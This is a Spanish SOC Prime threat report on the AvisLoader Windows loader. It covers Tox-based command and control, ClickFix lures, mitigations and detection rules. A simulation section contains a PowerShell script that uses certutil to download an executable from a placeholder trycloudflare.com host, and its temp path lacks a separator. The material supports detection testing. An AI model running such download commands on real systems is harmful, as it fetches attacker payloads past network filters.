SOC Prime Bias: High

25 Sep 2026 08:27 UTC

AvisLoader emerge como un cargador de malware para Windows resistente

Author Photo
SOC Prime Team linkedin icon Seguir
AvisLoader emerge como un cargador de malware para Windows resistente
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

AvisLoader es un cargador de malware para Windows recién identificado que utiliza la red de mensajería peer-to-peer (P2P) Tox para comunicación de mando y control (C2). Este enfoque descentralizado permite a los operadores mantener la conectividad y reubicar los controladores sin depender de dominios fijos o servidores centralizados. El malware se distribuye comúnmente a través de cebos de ingeniería social ClickFix alojados en la infraestructura de Cloudflare.

Investigación

Varonis Threat Labs descubrió el cargador en un servidor de puesta en escena expuesto junto con su centro de mando y herramientas relacionadas. La investigación identificó un cebo ClickFix con tema de DocuSign que instruye a los usuarios a ejecutar comandos que recuperan cargas útiles a través de Túneles Rápidos de Cloudflare. El análisis del ejecutable encontró comunicación C2 basada en Tox, funcionalidad de bypass de UAC, y módulos diseñados para ocultar procesos maliciosos.

Mitigación

Las organizaciones deben entrenar a los usuarios para que reconozcan y reporten mensajes de firma de documentos que les pidan pegar comandos en terminales o en el cuadro de diálogo Ejecutar de Windows. Los equipos de seguridad deben monitorear el uso sospechoso de Cloudflare Workers y Quick Tunnels en cebos basados en la web. Detectar tráfico de red peer-to-peer (P2P) inesperado y cambios no autorizados a accesos directos del escritorio también puede ayudar a reducir el riesgo.

Respuesta

Cuando se detecta actividad de AvisLoader, los equipos de seguridad deben revisar la línea de procesos de shells de comandos e intérpretes de scripts lanzados tras visitar dominios sospechosos. Inspeccionar los endpoints para detectar accesos directos modificados, .backup archivos, y el artefacto VLCAssistant . La telemetría de la red también debe ser revisada para detectar tráfico inusual del protocolo Tox originado de hosts afectados.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

Ejecutable sospechoso que solo contiene números en el nombre (vía cmdline)

Equipo SOC Prime
24 Sep 2026

Comunicación sospechosa de dominio Trycloudflare (vía DNS)

Equipo SOC Prime
24 Sep 2026

Intento sospechoso de ejecución de Curl [MacOS] (vía cmdline)

Equipo SOC Prime
24 Sep 2026

IOCs (HashSha256) para detectar: Conozca AvisLoader: Un cargador de Windows diseñado para perdurar tras un desmantelamiento

Reglas de IA de SOC Prime
24 Sep 2026

Detectar tráfico inesperado de Tox o Peer-to-Peer [Conexión de Red en Windows]

Reglas de IA de SOC Prime
24 Sep 2026

Detección de Ejecución Remota de Código a través de Shells de Comandos y Cloudflare Quick Tunnel [Creación de Procesos en Windows]

Reglas de IA de SOC Prime
24 Sep 2026

Ejecución de Simulación

  • Narrativa del Ataque & Comandos: Un adversario ha obtenido acceso inicial a una estación de trabajo. Para mantener la persistencia y descargar su carga útil modular secundaria, utilizan un Cloudflare Quick Tunnel para sortear el filtrado de salida. El atacante utiliza certutil.exe, una utilidad incorporada de Windows, para descargar la carga útil desde https://malicious-tunnel-id.trycloudflare.com/payload.exe. Este método es elegido porque certutil es un binario de confianza y el tráfico parece dirigirse a una infraestructura de Cloudflare legítima, lo que hace menos probable que sea marcado por filtros básicos de reputación de red.

  • Script de Prueba de Regresión:

    # Script de simulación para activar la regla de detección.
    # Esto utiliza certutil para intentar una descarga desde una dirección trycloudflare.com.
    
    $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe"
    Write-Host "[*] Simulando actividad del adversario: Descargando desde $targetUrl vía certutil..."
    
    # El siguiente comando está diseñado para activar las condiciones 'selection_tunnel' Y 'selection_tools'.
    certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe"
    
    if ($LASTEXITCODE -eq 0) {
        Write-Host "[+] Comando de simulación ejecutado con éxito."
    } else {
        Write-Host "[-] Comando fallido (esperado si la URL no existe, pero se debe generar telemetría)."
    }
  • Comandos de Limpieza:

    # Script de limpieza para eliminar la carga útil simulada y artefactos locales.
    $tempFile = "$env:TEMPmalware.exe"
    if (Test-Path $tempFile) {
        Remove-Item -Path $tempFile -Force
        Write-Host "[+] Limpieza de $tempFile"
    } else {
        Write-Host "[-] No se encontró artefacto para limpiar."
    }